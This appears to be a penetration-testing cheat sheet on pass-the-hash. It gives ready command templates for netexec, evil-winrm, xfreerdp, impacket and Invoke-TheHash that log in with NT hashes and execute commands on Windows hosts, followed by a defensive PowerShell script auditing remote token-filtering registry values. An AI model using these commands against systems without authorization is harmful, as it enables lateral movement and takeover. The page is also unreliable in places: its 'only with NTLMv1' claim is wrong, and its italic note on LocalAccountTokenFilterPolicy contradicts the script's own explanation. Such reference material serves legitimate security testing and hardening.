# Pass The Hash

Only with **NTLMv1**.

It consists of passing a hash in place of the password to log in, which is useful when password cracking has failed. It works against Active Directory domain accounts as well as local accounts (in which case no domain is passed).

Requires an SMB connection, Windows File and Printer Sharing enabled, the ADMIN$ share available (all default settings on modern Windows Server systems) and valid credentials with local administrative permissions.

This method works for Active Directory domain accounts and the built-in local administrator account. However, due to the [*2014 security update*](https://support.microsoft.com/en-us/help/2871997/microsoft-security-advisory-update-to-improve-credentials-protection-a), this technique cannot be used to authenticate as any other local admin account.

{% tabs %}
{% tab title="Linux" %}

<table><thead><tr><th width="196">Tools</th><th>Details</th></tr></thead><tbody><tr><td><a href="https://www.netexec.wiki/">netexec</a></td><td><code>nxc smb &#x3C;IP> -d . -u &#x3C;USER> -H &#x3C;HASH> -x &#x3C;COMMAND></code><br><code>nxc smb &#x3C;IP> --local-auth -u &#x3C;USER> -H &#x3C;HASH> -x &#x3C;COMMAND></code></td></tr><tr><td><a href="https://github.com/Hackplayers/evil-winrm">evil-winrm</a></td><td><code>evil-winrm -i &#x3C;IP> -u &#x3C;USER>[@&#x3C;DOMAIN>] -H &#x3C;HASH></code></td></tr><tr><td><a href="https://github.com/FreeRDP/FreeRDP">xfreerdp</a></td><td><code>xfreerdp /v:&#x3C;IP> /u:&#x3C;USER> /pth:&#x3C;HASH> /dynamic-resolution</code></td></tr><tr><td><a href="https://github.com/fortra/impacket/blob/master/examples/smbclient.py">impacket-smbclient</a></td><td><code>impacket-smbclient -hashes &#x3C;[LMHash]:NTHash> [&#x3C;DOMAIN>/]&#x3C;USER>@&#x3C;IP></code></td></tr><tr><td><a href="https://github.com/fortra/impacket/blob/master/examples/psexec.py">impacket-psexec</a></td><td><code>psexec -hashes &#x3C;[LMHash]:NTHash> &#x3C;USER>@&#x3C;IP></code></td></tr><tr><td><a href="https://github.com/fortra/impacket/blob/master/examples/wmiexec.py">impacket-wmiexec</a></td><td><code>wmiexec -hashes &#x3C;[LMHash]:NTHash> &#x3C;USER>@&#x3C;IP></code></td></tr><tr><td>smbclient (Samba)</td><td><code>smbclient -U &#x3C;USER> --pw-nt-hash //&#x3C;IP>/&#x3C;SHARE></code><br><em>> enter the hash instead of the password</em></td></tr></tbody></table>

Other [**impacket-scripts**](https://www.kali.org/tools/impacket-scripts/#impacket-scripts) such as [atexec](https://github.com/fortra/impacket/blob/master/examples/atexec.py) and [smbexec](https://github.com/fortra/impacket/blob/master/examples/smbexec.py) can be used the same way.
{% endtab %}

{% tab title="Windows" %}

### [Invoke-TheHash](https://github.com/Kevin-Robertson/Invoke-TheHash)

{% code overflow="wrap" %}

```powershell
Invoke-SMBExec -Target <IP> [-Domain <DOMAIN>] -Username <USER> -Hash <HASH> -Command "<CMD>"
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
Invoke-WMIExec -Target <IP> [-Domain <DOMAIN>] -Username <USER> -Hash <HASH> -Command "<CMD>"
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
Invoke-SMBClient -Username <USER> -Hash <HASH> -Source \\server\share [-Action Get|Delete]
```

{% endcode %}
{% endtab %}
{% endtabs %}

*The user and hash used for authentication must have administrative rights on the target computer. If LocalAccountTokenFilterPolicy is set, only the RID-500 account, "Administrator", can perform remote administration tasks; if FilterAdministratorToken is also set, neither can. These settings apply only to local administrative accounts.*
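The two registry values named above decide how far a local administrator's hash gets over the network, so a defender auditing a host wants to read them rather than guess. The following PowerShell is an added example, not code from the original page or from Invoke-TheHash: it reads `LocalAccountTokenFilterPolicy` and `FilterAdministratorToken` from `HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System`, treats an absent value as the Windows default (0 for both), and reports which local admin accounts would receive a full remote token. The precedence it applies (`LocalAccountTokenFilterPolicy = 1` overrides `FilterAdministratorToken`) is an assumption stated in the comments; the function and variable names are the example's own.

```powershell
# Added example, not part of the original page. Audits the remote UAC token
# filtering settings that govern pass-the-hash with LOCAL admin accounts.
# Assumes it runs on the host being audited with rights to read HKLM.

$policyKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

function Get-DwordOrDefault {
    # Returns the DWORD value if present, otherwise the caller's default
    # (absent value == Windows default behaviour for both policies).
    param([string]$Path, [string]$Name, [int]$Default)
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $Default }
    return [int]$item.$Name
}

function Get-RemoteLocalAdminExposure {
    # Defaults when the values are absent:
    #   LocalAccountTokenFilterPolicy = 0  -> remote UAC token filtering ON
    #   FilterAdministratorToken      = 0  -> built-in RID-500 Administrator NOT filtered
    $tokenFilterPolicy = Get-DwordOrDefault -Path $policyKey -Name 'LocalAccountTokenFilterPolicy' -Default 0
    $filterAdminToken  = Get-DwordOrDefault -Path $policyKey -Name 'FilterAdministratorToken'    -Default 0

    # Assumption: LocalAccountTokenFilterPolicy = 1 disables filtering for every
    # local account and therefore takes precedence over FilterAdministratorToken.
    if ($tokenFilterPolicy -eq 1) {
        $exposure = 'WEAK: every local administrator gets a full token over the network'
    } elseif ($filterAdminToken -eq 1) {
        $exposure = 'HARDENED: no local administrator, not even RID-500, gets a full remote token'
    } else {
        $exposure = 'DEFAULT: only the built-in RID-500 Administrator gets a full remote token'
    }

    [pscustomobject]@{
        LocalAccountTokenFilterPolicy = $tokenFilterPolicy
        FilterAdministratorToken      = $filterAdminToken
        RemoteLocalAdminExposure      = $exposure
    }
}

function Restore-DefaultTokenFiltering {
    # Puts the weak setting back to the Windows default (filtering ON).
    # Supports -WhatIf so the change can be previewed before it is made.
    [CmdletBinding(SupportsShouldProcess)]
    param()
    if ($PSCmdlet.ShouldProcess($policyKey, 'Set LocalAccountTokenFilterPolicy = 0')) {
        Set-ItemProperty -Path $policyKey -Name 'LocalAccountTokenFilterPolicy' -Value 0 -Type DWord
    }
}

# Usage: report the current state; remediate only after reviewing it.
Get-RemoteLocalAdminExposure | Format-List
# Restore-DefaultTokenFiltering -WhatIf
```

`Get-RemoteLocalAdminExposure` only reads the registry, so it is safe to run fleet-wide through a remoting session or a scheduled audit; `Restore-DefaultTokenFiltering` is the one function that writes, and it is gated behind `ShouldProcess` so a `-WhatIf` run shows the intended change without applying it.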
